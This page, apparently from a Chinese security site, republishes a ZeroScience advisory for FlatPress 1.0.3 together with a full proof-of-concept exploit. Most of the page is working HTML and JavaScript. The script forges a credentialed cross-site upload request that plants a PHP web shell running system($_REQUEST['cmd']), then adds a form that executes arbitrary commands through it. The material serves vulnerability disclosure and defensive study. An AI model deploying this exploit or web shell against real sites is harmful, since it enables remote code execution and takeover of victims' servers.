首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FlatPress 1.0.3 - CSRF Arbitrary File Upload 来源：http://www.zeroscience.mk 作者：LiquidWorm 发布时间：2016-06-01   <!DOCTYPE html> <!--     FlatPress 1.0.3 CSRF Arbitrary File Upload     Vendor: Edoardo Vacchi Product web page: http://www.flatpress.org Affected version: 1.0.3   Summary: FlatPress is a blogging engine that saves your posts as simple text files. Forget about SQL! You just need some PHP.   Desc: The vulnerability is caused due to the improper verification of uploaded files via the Uploader script using 'upload[]' POST parameter which allows of arbitrary files being uploaded in '/fp-content/attachs' directory. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform actions with administrative privileges if a logged-in user visits a malicious web site resulting in execution of arbitrary PHP code by uploading a malicious PHP script file and execute system commands.   Tested on: Apache/2.4.10            PHP/5.6.3     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                             @zeroscience     Advisory ID: ZSL-2016-5328 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php     04.04.2016   -->     <html> <title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title> <body>   <script type="text/javascript">   function exec(){   var command = document.getElementById("exec");   var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";   var cmdexec = command.value;   window.open(url+cmdexec,"ZSL_iframe"); }   function upload(){   var xhr = new XMLHttpRequest();   xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);   xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");   xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");   xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");   xhr.withCredentials = true;   var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +     "\r\n" +     "5a462c73ac\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +     "\r\n" +     "/flatpress/admin.php?p=uploader\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\x3c?php\r\n" +     "system($_REQUEST[\'cmd\']);\r\n" +     "?\x3e\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +     "Content-Type: application/octet-stream\r\n" +     "\r\n" +     "\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +     "Content-Disposition: form-data; name=\"upload\"\r\n" +     "\r\n" +     "Upload\r\n" +     "------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";   var aBody = new Uint8Array(body.length);   for (var i = 0; i < aBody.length; i++)     aBody[i] = body.charCodeAt(i);     xhr.send(new Blob([aBody])); }   </script>   <h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>   <form action="#">   <button type="button" onclick=upload()>Upload test.php file!</button> </form><br />   <form action="javascript:exec()">   <input type="text" id="exec" placeholder="Enter a command">   <input type="submit" value="Execute!"> </form><br />   <iframe   style="border:2px;border-style:dashed;color:#d3d3d3"   srcdoc="command output frame"   width="700" height="600"   name="ZSL_iframe"> </iframe> <br /> <font size="2" color="#d3d3d3">ZSL-2016-5328</font>   </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MySQL 5.5.45 - procedure analy ·CCextractor 0.80 - Crash PoC ·WordPress Ninja Forms Unauthen ·TCPDump 4.5.1 - Crash PoC ·HP Data Protector A.09.00 - Ar ·HP Data Protector A.09.00 - En ·Micro Focus Rumba+ 9.4 - Multi ·Konica Minolta FTP Utility 1.0 ·Ubiquiti airOS Arbitrary File ·Boxoft Wav To MP3 Converter 1. ·Oracle ATS Arbitrary File Uplo ·Microsoft Windows Forced Firew   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved